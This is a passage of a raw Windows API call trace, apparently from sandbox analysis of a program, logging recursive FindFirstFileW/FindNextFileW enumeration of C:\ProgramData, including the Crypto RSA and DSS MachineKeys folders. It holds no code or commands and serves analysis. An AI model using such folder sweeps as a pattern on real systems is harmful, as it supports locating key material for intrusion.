lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.709] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0139.709] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0139.709] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.709] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0 [0139.709] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.710] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0139.710] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0139.710] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0139.710] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0139.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa32828 [0139.711] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.711] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0139.711] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.711] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.711] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.711] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.712] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.712] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.712] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.712] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32968 [0139.713] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.713] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.713] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0 [0139.713] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.713] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.713] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.713] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.713] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.713] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.713] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.713] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.714] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.714] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.714] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.714] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.715] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.715] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.715] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.715] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.715] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.716] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.716] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.716] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.716] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.716] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.716] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.716] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.717] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0139.717] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0139.717] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.717] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0139.717] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.717] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0139.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.718] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0139.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.718] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0139.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0139.718] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0139.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0139.718] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.718] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.718] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.718] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.719] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.719] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.719] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.719] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.719] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.720] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32968 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.721] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.722] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0 [0139.722] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.722] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.722] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.722] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.723] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.723] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.723] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.723] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.723] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.723] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.723] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.724] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.724] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.724] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.725] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.725] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.726] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.726] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.726] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.726] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.726] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.726] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.726] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.726] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.726] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.726] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.726] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.727] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.727] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.727] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.727] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.727] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.727] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.727] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.727] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.727] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.728] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.728] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.728] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.728] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.728] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.728] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.728] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.728] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.728] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.728] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0139.728] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0139.728] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0139.729] FindNextFileW (in: hFindFile=0xa32868, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0139.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0139.730] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.730] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.730] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.730] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.731] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.732] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.732] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.732] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.732] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.732] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.732] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.733] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.733] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.733] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.733] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0 [0139.733] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.733] FindNextFileW (in: hFindFile=0xa328a8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0139.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328e8 [0139.733] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.733] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32968 [0139.734] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0 [0139.734] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.734] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.734] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0 [0139.735] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.735] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 1 [0139.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32928 [0139.735] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x2b4ec64 | 